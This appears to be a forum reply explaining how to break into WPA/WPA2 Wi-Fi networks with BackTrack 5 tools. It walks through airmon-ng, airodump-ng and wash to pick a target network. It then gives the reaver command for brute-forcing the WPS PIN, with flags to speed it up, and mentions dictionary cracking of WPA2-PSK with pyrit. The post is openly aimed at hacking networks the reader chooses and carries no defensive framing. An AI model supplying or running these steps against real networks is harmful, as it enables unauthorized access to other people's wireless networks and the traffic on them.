WPA,WPA2,WPA2 PSK....which one of these? tbh there is many ways, for WPA2 PSK you need a dictionary, WPA2/WPA can be easly cracked whit reaver....first of all if you're using backtrack 5 (r2,r3) then you have installed reaver and everything you need (also there is pyrit for WPA2 psk)....
1. open terminal type airmon-ng
2. airmon-ng start wlan0 (starts monitor mode for ex. "mon0")
3. airodump-ng mon0 (scan) when you find network you want to hack,all you need is bssid,channel ( you can stop scan with ctrl-c) ...you can also do it with another program "wash -i mon0"
5. open new terminal and type "reaver -i mon0 -b "targets BSSID" -c "CHANNEL" -d 0 -vv

explanation of reaver commands:
-i interface
-d delay between attemps deafult is 1 sec so -d 0 gonna speed it up

you can also speed it up with --dh-small ....

for PSK you will need to bruteforce password for that you need rly good dictionary of possible words and it can take a long time to crack...
you can speed it up with pyritc ( check gerix wifi cracker ) i think i made 1 thread long time ago about WEP crack with gerix so you can use it for some informations...
